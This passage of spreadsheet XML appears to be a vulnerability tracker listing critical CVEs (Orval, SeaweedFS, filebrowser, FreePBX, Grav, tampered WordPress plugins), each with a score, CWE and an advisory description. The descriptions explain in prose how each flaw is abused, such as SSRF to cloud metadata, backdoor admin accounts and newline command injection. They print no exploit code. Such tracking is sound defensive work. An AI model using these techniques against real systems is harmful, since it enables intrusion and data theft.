      <c r="C467" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="D467" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E467" s="5" t="inlineStr"/>
      <c r="F467" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G467" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H467" s="5" t="inlineStr"/>
      <c r="I467" s="5" t="inlineStr">
        <is>
          <t>2026-08-19</t>
        </is>
      </c>
      <c r="J467" s="5" t="inlineStr"/>
      <c r="K467" s="5" t="inlineStr">
        <is>
          <t>CWE-116, CWE-1336, CWE-94</t>
        </is>
      </c>
      <c r="L467" s="5" t="inlineStr">
        <is>
          <t>Orval generates type-safe JavaScript clients in TypeScript from OpenAPI v3 and Swagger v2 specifications. Prior to 8.21.0, a ${...} expression or backtick in an array item default is emitted into a module-level template literal emitted by zod schema generation without safe encoding. This permits attacker-controlled JavaScript to be evaluated when the generated zod schema module is imported, resulting in code execution in the developer, CI, test, or application environment. The affected code is packages/zod/src/index.ts function formatDefaultValue. This issue is fixed in version 8.21.0.</t>
        </is>
      </c>
      <c r="M467" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-71869</t>
        </is>
      </c>
    </row>
    <row r="468">
      <c r="A468" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B468" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-71871</t>
        </is>
      </c>
      <c r="C468" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="D468" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E468" s="5" t="inlineStr"/>
      <c r="F468" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G468" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H468" s="5" t="inlineStr"/>
      <c r="I468" s="5" t="inlineStr">
        <is>
          <t>2026-08-19</t>
        </is>
      </c>
      <c r="J468" s="5" t="inlineStr"/>
      <c r="K468" s="5" t="inlineStr">
        <is>
          <t>CWE-116, CWE-1336, CWE-94</t>
        </is>
      </c>
      <c r="L468" s="5" t="inlineStr">
        <is>
          <t>Orval generates type-safe JavaScript clients in TypeScript from OpenAPI v3 and Swagger v2 specifications. Prior to 8.21.0, a ${...} expression or backtick in a header parameter default is emitted into a module-level template literal emitted by zod schema generation without safe encoding. This permits attacker-controlled JavaScript to be evaluated when the generated zod schema module is imported, resulting in code execution in the developer, CI, test, or application environment. The affected code is packages/zod/src/index.ts function formatDefaultValue. This issue is fixed in version 8.21.0.</t>
        </is>
      </c>
      <c r="M468" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-71871</t>
        </is>
      </c>
    </row>
    <row r="469">
      <c r="A469" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B469" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-71960</t>
        </is>
      </c>
      <c r="C469" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="D469" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E469" s="5" t="inlineStr"/>
      <c r="F469" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G469" s="5" t="inlineStr"/>
      <c r="H469" s="5" t="inlineStr"/>
      <c r="I469" s="5" t="inlineStr">
        <is>
          <t>2026-08-19</t>
        </is>
      </c>
      <c r="J469" s="5" t="inlineStr"/>
      <c r="K469" s="5" t="inlineStr">
        <is>
          <t>CWE-798</t>
        </is>
      </c>
      <c r="L469" s="5" t="inlineStr">
        <is>
          <t>Cudy WR3000 2.0 running firmware before 2.5.24 contains a hard-coded JWT HMAC signing secret vulnerability in the Mosquitto MQTT broker's authentication plugin that allows unauthenticated attackers to forge valid JWT tokens by extracting the secret from the firmware image. Attackers can use the extracted secret to craft arbitrary JWT tokens and authenticate to the MQTT broker without legitimate credentials, gaining unauthorized access to the device's mesh networking interface.</t>
        </is>
      </c>
      <c r="M469" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-71960</t>
        </is>
      </c>
    </row>
    <row r="470">
      <c r="A470" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B470" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72716</t>
        </is>
      </c>
      <c r="C470" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="D470" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E470" s="5" t="inlineStr"/>
      <c r="F470" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="G470" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H470" s="5" t="inlineStr"/>
      <c r="I470" s="5" t="inlineStr">
        <is>
          <t>2026-08-19</t>
        </is>
      </c>
      <c r="J470" s="5" t="inlineStr"/>
      <c r="K470" s="5" t="inlineStr">
        <is>
          <t>CWE-1336</t>
        </is>
      </c>
      <c r="L470" s="5" t="inlineStr">
        <is>
          <t>Orval generates type-safe JavaScript clients in TypeScript from OpenAPI v3 and Swagger v2 specifications. Prior to 8.21.0, a ${...} expression or backtick in a query parameter default is emitted into a module-level template literal emitted by zod schema generation without safe encoding. This permits attacker-controlled JavaScript to be evaluated when the generated zod schema module is imported, resulting in code execution in the developer, CI, test, or application environment. The affected code is packages/zod/src/index.ts function formatDefaultValue. This issue is fixed in version 8.21.0.</t>
        </is>
      </c>
      <c r="M470" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72716</t>
        </is>
      </c>
    </row>
    <row r="471">
      <c r="A471" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B471" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72717</t>
        </is>
      </c>
      <c r="C471" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="D471" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E471" s="5" t="inlineStr"/>
      <c r="F471" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="G471" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H471" s="5" t="inlineStr"/>
      <c r="I471" s="5" t="inlineStr">
        <is>
          <t>2026-08-19</t>
        </is>
      </c>
      <c r="J471" s="5" t="inlineStr"/>
      <c r="K471" s="5" t="inlineStr">
        <is>
          <t>CWE-116, CWE-1336, CWE-94</t>
        </is>
      </c>
      <c r="L471" s="5" t="inlineStr">
        <is>
          <t>Orval generates type-safe JavaScript clients in TypeScript from OpenAPI v3 and Swagger v2 specifications. Prior to 8.21.0, a ${...} expression or backtick in a schema default is emitted into a module-level template literal emitted by zod schema generation without safe encoding. This permits attacker-controlled JavaScript to be evaluated when the generated zod schema module is imported, resulting in code execution in the developer, CI, test, or application environment. The affected code is packages/zod/src/index.ts function formatDefaultValue. This issue is fixed in version 8.21.0.</t>
        </is>
      </c>
      <c r="M471" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72717</t>
        </is>
      </c>
    </row>
    <row r="472">
      <c r="A472" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B472" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72839</t>
        </is>
      </c>
      <c r="C472" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="D472" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E472" s="5" t="inlineStr"/>
      <c r="F472" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G472" s="5" t="inlineStr"/>
      <c r="H472" s="5" t="inlineStr"/>
      <c r="I472" s="5" t="inlineStr">
        <is>
          <t>2026-08-13</t>
        </is>
      </c>
      <c r="J472" s="5" t="inlineStr"/>
      <c r="K472" s="5" t="inlineStr">
        <is>
          <t>CWE-266</t>
        </is>
      </c>
      <c r="L472" s="5" t="inlineStr">
        <is>
          <t>filebrowser through 2.63.16 fails to properly restrict scope and permissions when self-signup is enabled with default CreateUserDir setting. Unauthenticated attackers can register accounts that inherit the server root scope with full create, modify, delete, rename, share, and download permissions, allowing unrestricted access to all files.</t>
        </is>
      </c>
      <c r="M472" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72839</t>
        </is>
      </c>
    </row>
    <row r="473">
      <c r="A473" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B473" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73080</t>
        </is>
      </c>
      <c r="C473" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="D473" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E473" s="5" t="inlineStr"/>
      <c r="F473" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G473" s="5" t="inlineStr"/>
      <c r="H473" s="5" t="inlineStr"/>
      <c r="I473" s="5" t="inlineStr">
        <is>
          <t>2026-08-11</t>
        </is>
      </c>
      <c r="J473" s="5" t="inlineStr"/>
      <c r="K473" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="L473" s="5" t="inlineStr">
        <is>
          <t>SeaweedFS is a distributed storage system. Prior to 4.24, VolumeServer.FetchAndWriteNeedle in weed/server/volume_grpc_remote.go fetches a caller-supplied remote endpoint through weed/remote_storage/s3/s3_storage_client.go and writes the response into a needle. The RPC performs no authentication and no target validation, allowing anyone who can reach a volume server's gRPC port to cause requests to arbitrary hosts, including loopback, link-local, RFC 1918, and cloud metadata endpoints such as 169.254.169.254, and read the response. On cloud deployments, this can disclose instance metadata and IAM credentials and reach otherwise unexposed internal services. The volume server gRPC plane is unauthenticated by default, and configuring documented JWT signing keys does not protect this RPC. This issue is fixed in version 4.24.</t>
        </is>
      </c>
      <c r="M473" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73080</t>
        </is>
      </c>
    </row>
    <row r="474">
      <c r="A474" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B474" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73090</t>
        </is>
      </c>
      <c r="C474" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="D474" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E474" s="5" t="inlineStr"/>
      <c r="F474" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G474" s="5" t="inlineStr"/>
      <c r="H474" s="5" t="inlineStr"/>
      <c r="I474" s="5" t="inlineStr">
        <is>
          <t>2026-08-11</t>
        </is>
      </c>
      <c r="J474" s="5" t="inlineStr"/>
      <c r="K474" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="L474" s="5" t="inlineStr">
        <is>
          <t>PeerTube is an ActivityPub-federated video streaming platform. Prior to 8.2.2, processUpdateActivity and processUpdateVideo accept an ActivityPub Update containing a Video object without verifying that byActor.url is authorized for the host in videoObject.id, allowing a malicious federated server to rewrite another server's video metadata, visibility, media file, and HLS URLs. This issue is fixed in version 8.2.2.</t>
        </is>
      </c>
      <c r="M474" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73090</t>
        </is>
      </c>
    </row>
    <row r="475">
      <c r="A475" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B475" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73251</t>
        </is>
      </c>
      <c r="C475" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="D475" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E475" s="5" t="inlineStr"/>
      <c r="F475" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G475" s="5" t="inlineStr"/>
      <c r="H475" s="5" t="inlineStr"/>
      <c r="I475" s="5" t="inlineStr">
        <is>
          <t>2026-08-20</t>
        </is>
      </c>
      <c r="J475" s="5" t="inlineStr"/>
      <c r="K475" s="5" t="inlineStr">
        <is>
          <t>CWE-295</t>
        </is>
      </c>
      <c r="L475" s="5" t="inlineStr">
        <is>
          <t>Mongoose is an embedded web server and network library. Prior to 7.23, a network attacker can impersonate a TLS server to a Mongoose client configured with a multi-certificate CA bundle. In src/tls_builtin.c, the mg_tls_init() function stores the bundle in tls-&gt;ca_bundle_der while tls-&gt;ca_der.len remains zero, and mg_tls_recv_cert() uses tls_bundle_find() to accept a Common Name match without calling mg_tls_verify_cert_signature(). A forged self-signed certificate can therefore satisfy hostname and CertificateVerify checks and enable interception, credential disclosure, traffic modification, and malicious responses. This issue is fixed in version 7.23.</t>
        </is>
      </c>
      <c r="M475" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73251</t>
        </is>
      </c>
    </row>
    <row r="476">
      <c r="A476" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B476" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73532</t>
        </is>
      </c>
      <c r="C476" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="D476" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E476" s="5" t="inlineStr"/>
      <c r="F476" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G476" s="5" t="inlineStr"/>
      <c r="H476" s="5" t="inlineStr"/>
      <c r="I476" s="5" t="inlineStr">
        <is>
          <t>2026-08-13</t>
        </is>
      </c>
      <c r="J476" s="5" t="inlineStr"/>
      <c r="K476" s="5" t="inlineStr">
        <is>
          <t>CWE-506</t>
        </is>
      </c>
      <c r="L476" s="5" t="inlineStr">
        <is>
          <t>Fluent Forms Pro 6.2.7 contains an embedded malicious code vulnerability introduced via a tampered plugin build served through a decommissioned update server. The tampered build introduced a rogue PHP file (libs/class-license-sync.php), loaded via a require_once directive added to fluentformpro.php, that established a backdoor REST API endpoint, dropped persistent PHP files in mu-plugins and uploads directories, installed a passwordless administrator account, and registered scheduled tasks that survived plugin removal.</t>
        </is>
      </c>
      <c r="M476" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73532</t>
        </is>
      </c>
    </row>
    <row r="477">
      <c r="A477" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B477" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73533</t>
        </is>
      </c>
      <c r="C477" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="D477" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E477" s="5" t="inlineStr"/>
      <c r="F477" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G477" s="5" t="inlineStr"/>
      <c r="H477" s="5" t="inlineStr"/>
      <c r="I477" s="5" t="inlineStr">
        <is>
          <t>2026-08-13</t>
        </is>
      </c>
      <c r="J477" s="5" t="inlineStr"/>
      <c r="K477" s="5" t="inlineStr">
        <is>
          <t>CWE-506</t>
        </is>
      </c>
      <c r="L477" s="5" t="inlineStr">
        <is>
          <t>Ninja Tables Pro 5.2.11 contains an embedded malicious code vulnerability introduced via a tampered plugin build served through a decommissioned update server. The tampered build introduced a rogue PHP file (app/Library/updater/NinjaTableDataSync.php) that established a backdoor REST API endpoint, dropped persistent PHP files in mu-plugins and uploads directories, installed a passwordless administrator account, and registered scheduled tasks that survived plugin removal.</t>
        </is>
      </c>
      <c r="M477" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73533</t>
        </is>
      </c>
    </row>
    <row r="478">
      <c r="A478" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B478" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73665</t>
        </is>
      </c>
      <c r="C478" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="D478" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E478" s="5" t="inlineStr"/>
      <c r="F478" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G478" s="5" t="inlineStr"/>
      <c r="H478" s="5" t="inlineStr"/>
      <c r="I478" s="5" t="inlineStr">
        <is>
          <t>2026-08-13</t>
        </is>
      </c>
      <c r="J478" s="5" t="inlineStr"/>
      <c r="K478" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="L478" s="5" t="inlineStr">
        <is>
          <t>FreePBX is an open source IP PBX. Prior to 17.0.9, the UCP Node server on ports 8001 and 8003 uses io.use(checkAuth) in node/lib/server.js, but Socket.IO version 4 applies that middleware only to the default namespace. An unauthenticated client can connect to custom namespaces that do not consistently invoke checkAuth in node/lib/auth.js and send crafted event values containing carriage-return or newline characters through the Asterisk Manager Interface action path patched by node/lib/asterisk-manager-patch.js, allowing arbitrary commands to execute as the asterisk service user. This issue is fixed in version 17.0.9.</t>
        </is>
      </c>
      <c r="M478" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73665</t>
        </is>
      </c>
    </row>
    <row r="479">
      <c r="A479" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B479" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75827</t>
        </is>
      </c>
      <c r="C479" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="D479" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E479" s="5" t="inlineStr"/>
      <c r="F479" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="G479" s="5" t="inlineStr"/>
      <c r="H479" s="5" t="inlineStr"/>
      <c r="I479" s="5" t="inlineStr">
        <is>
          <t>2026-08-18</t>
        </is>
      </c>
      <c r="J479" s="5" t="inlineStr"/>
      <c r="K479" s="5" t="inlineStr">
        <is>
          <t>CWE-94</t>
        </is>
      </c>
      <c r="L479" s="5" t="inlineStr">
        <is>
          <t>Grav before 2.0.15 contains an arbitrary file write vulnerability in the Blueprint dynamic-data bare-function validation that uses an incomplete denylist instead of a positive allowlist. Attackers with page-edit or blueprint-config access can invoke the error_log function through a data directive to append PHP payloads to web-accessible files, achieving remote code execution.</t>
        </is>
      </c>
      <c r="M479" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75827</t>
        </is>
      </c>
    </row>
    <row r="480">
      <c r="A480" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B480" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75828</t>
        </is>
      </c>
      <c r="C480" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="D480" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E480" s="5" t="inlineStr"/>
      <c r="F480" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G480" s="5" t="inlineStr"/>
      <c r="H480" s="5" t="inlineStr"/>
      <c r="I480" s="5" t="inlineStr">
        <is>
          <t>2026-08-18</t>
        </is>
      </c>
      <c r="J480" s="5" t="inlineStr"/>
      <c r="K480" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L480" s="5" t="inlineStr">
        <is>
          <t>Grav before 2.0.15 contains a stored cross-site scripting vulnerability in the detectXss() function where unpaired quotes in unquoted attribute values bypass event-handler detection. Authenticated editors can inject event handlers like onerror= that pass validation and execute in visitor browsers when page content is rendered.</t>
        </is>
      </c>
      <c r="M480" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75828</t>
        </is>
      </c>
    </row>
    <row r="481">
      <c r="A481" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B481" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75832</t>
        </is>
      </c>
      <c r="C481" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="D481" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E481" s="5" t="inlineStr"/>
      <c r="F481" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G481" s="5" t="inlineStr"/>
      <c r="H481" s="5" t="inlineStr"/>
      <c r="I481" s="5" t="inlineStr">
        <is>
          <t>2026-08-18</t>
        </is>
      </c>
      <c r="J481" s="5" t="inlineStr"/>
      <c r="K481" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="L481" s="5" t="inlineStr">
        <is>
          <t>The Grav API plugin (getgrav/grav-plugin-api, bundled with Grav 2.0) before version 1.0.14 (fixed in 1.0.15) contains a missing authorization vulnerability in BlueprintPathResolver::resolveUserScope(). The method gates the users/&lt;name&gt; scope on the account's raw super-admin ACL flag (access.api.super) instead of validating the presented API key's actual scope. An attacker holding an API key scoped only to api.media.write minted on a super-admin account can bypass the authorization check and, via POST /blueprint-upload or GET /blueprint-files, write a file into another user's scope (in the shared user/accounts/ directory, constrained to image extensions by assertSafeExtension()) and browse that scope's file listing, despite the key not being granted api.users.write.</t>
        </is>
      </c>
      <c r="M481" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75832</t>
        </is>
      </c>
    </row>
    <row r="482">
      <c r="A482" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B482" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75835</t>
        </is>
      </c>
      <c r="C482" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="D482" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E482" s="5" t="inlineStr"/>
      <c r="F482" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G482" s="5" t="inlineStr"/>
      <c r="H482" s="5" t="inlineStr"/>
      <c r="I482" s="5" t="inlineStr">
        <is>
          <t>2026-08-18</t>
        </is>
      </c>
      <c r="J482" s="5" t="inlineStr"/>
      <c r="K482" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="L482" s="5" t="inlineStr">
        <is>
          <t>Grav API plugin (getgrav/grav-plugin-api) before 1.0.14 contains a missing authorization vulnerability in userPassesAuthorize() (AbstractApiController.php). The function fails to consult the calling request's API key scopes, relying instead on the account's raw super-admin flag and ACL grants. As a result, an authenticated attacker holding a scoped API key minted on a privileged account can bypass their declared scope restrictions to access authorize-gated UI metadata and item definitions (sidebar/menubar/widget items and users-list columns/row-actions/filter-tabs) that their key scope should deny, resulting in information disclosure.</t>
        </is>
      </c>
      <c r="M482" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75835</t>
        </is>
      </c>
    </row>
    <row r="483">
      <c r="A483" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B483" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75837</t>
        </is>
      </c>
      <c r="C483" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="D483" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E483" s="5" t="inlineStr"/>
      <c r="F483" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G483" s="5" t="inlineStr"/>
      <c r="H483" s="5" t="inlineStr"/>
      <c r="I483" s="5" t="inlineStr">
        <is>
          <t>2026-08-18</t>
        </is>
      </c>
      <c r="J483" s="5" t="inlineStr"/>
      <c r="K483" s="5" t="inlineStr">
        <is>
          <t>CWE-269</t>
        </is>
      </c>
      <c r="L483" s="5" t="inlineStr">
        <is>
          <t>Grav before 2.0.14 fails to guard the access field in the core group blueprint with the required security@: admin.super restriction. A delegated admin.users operator can save a group with access[admin][super]=true to escalate to super-admin, gaining scheduler and Twig evaluation capabilities.</t>
        </is>
      </c>
      <c r="M483" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75837</t>
        </is>
      </c>
    </row>
    <row r="484">
      <c r="A484" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B484" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75854</t>
        </is>
      </c>
      <c r="C484" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="D484" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E484" s="5" t="inlineStr"/>
      <c r="F484" s="5" t="n">
        <v>0.011</v>
      </c>
      <c r="G484" s="5" t="inlineStr">
        <is>
          <t>redis</t>
        </is>
      </c>
      <c r="H484" s="5" t="inlineStr"/>
      <c r="I484" s="5" t="inlineStr">
        <is>
          <t>2026-08-18</t>
        </is>
      </c>
      <c r="J484" s="5" t="inlineStr"/>
      <c r="K484" s="5" t="inlineStr">
        <is>
          <t>CWE-306</t>
        </is>
      </c>
      <c r="L484" s="5" t="inlineStr">
        <is>
          <t>ArcadeDB versions before 26.8.1 contain a missing authentication vulnerability in the Redis wire-protocol plugin that allows unauthenticated attackers to read, write, and delete data. Attackers can connect to the Redis port and execute arbitrary commands against any database on the server without providing credentials, bypassing all security gates.</t>
        </is>
      </c>
      <c r="M484" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75854</t>
        </is>
      </c>
    </row>
    <row r="485">
      <c r="A485" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B485" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75940</t>
        </is>
      </c>
      <c r="C485" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="D485" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E485" s="5" t="inlineStr"/>
      <c r="F485" s="5" t="inlineStr"/>
      <c r="G485" s="5" t="inlineStr"/>
      <c r="H485" s="5" t="inlineStr"/>
      <c r="I485" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J485" s="5" t="inlineStr"/>
      <c r="K485" s="5" t="inlineStr">
        <is>
          <t>CWE-798</t>
        </is>
      </c>
      <c r="L485" s="5" t="inlineStr">
        <is>
          <t>A vulnerability was reported in Lenovo Health Android Application, distributed exclusively in the Chinese market, that could allow an attacker to access sensitive health-related information.</t>
        </is>
      </c>
      <c r="M485" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75940</t>
        </is>
      </c>
    </row>
    <row r="486">
      <c r="A486" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B486" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-76200</t>
        </is>
      </c>
      <c r="C486" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="D486" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E486" s="5" t="inlineStr"/>
      <c r="F486" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G486" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H486" s="5" t="inlineStr">
        <is>
          <t>adobe:commerce, adobe:commerce_b2b, adobe:magento</t>
        </is>
      </c>
      <c r="I486" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J486" s="5" t="inlineStr"/>
      <c r="K486" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L486" s="5" t="inlineStr">
        <is>
          <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M486" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-76200</t>
        </is>
      </c>
    </row>
    <row r="487">
      <c r="A487" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B487" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-76201</t>
        </is>
      </c>
      <c r="C487" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="D487" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E487" s="5" t="inlineStr"/>
      <c r="F487" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G487" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H487" s="5" t="inlineStr">
        <is>
          <t>adobe:commerce, adobe:commerce_b2b, adobe:magento</t>
        </is>
      </c>
      <c r="I487" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J487" s="5" t="inlineStr"/>
      <c r="K487" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L487" s="5" t="inlineStr">
        <is>
          <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M487" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-76201</t>
        </is>
      </c>
    </row>
    <row r="488">
      <c r="A488" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B488" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77089</t>
        </is>
      </c>
      <c r="C488" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
